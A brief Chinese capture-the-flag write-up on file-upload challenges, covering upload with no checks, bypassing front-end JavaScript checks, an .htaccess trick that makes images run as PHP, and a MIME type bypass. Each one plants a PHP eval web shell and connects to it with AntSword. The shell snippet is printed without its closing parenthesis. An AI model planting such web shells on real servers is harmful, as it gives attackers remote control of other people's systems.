无验证
根据题目“无验证”可知,对上传文件没有进行任何验证
上传一句话木马,再用蚁剑进行连接
<?php
@eval($_POST['a']
?>
其中post的值可以随意更改
在地址后面添加上传文件相对路径,密码是post的值
连接
前端验证
根据题目以及代码文件分析得,题目考察的是JS前端验证,绕过JS验证即可
利用bp剔除响应JS,删除操作过程中得JS代码
编写一个一句话木马的php文件,上传,抓包
将remove all javascript勾选,forward
显示上传成功
用中国蚁剑进行连接,将相对路径添加到url地址后,接下来的步骤与第一题无验证一样
.htaccess
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
查看代码
不允许上传的文件格式中有php,但是没有htaccess
编写一个.htaccess文件,文件内容为
SetHandler application/x-httpd-php
目的是将上传的文件当成php解析
注:直接更改是无法将名称改成.htaccess的,打开记事本输入内容,另存为,文件名输入.htaccess,文件类型选择all,保存
上传
再上传一个有一句话木马的png文件
跟上两题一样,用蚁剑进行连接,得到flag
MIME绕过
上传一句话木马,抓包,对content-type后面的内容进行更改
点击forward,文件显示上传成功,用蚁剑进行连接,得到flag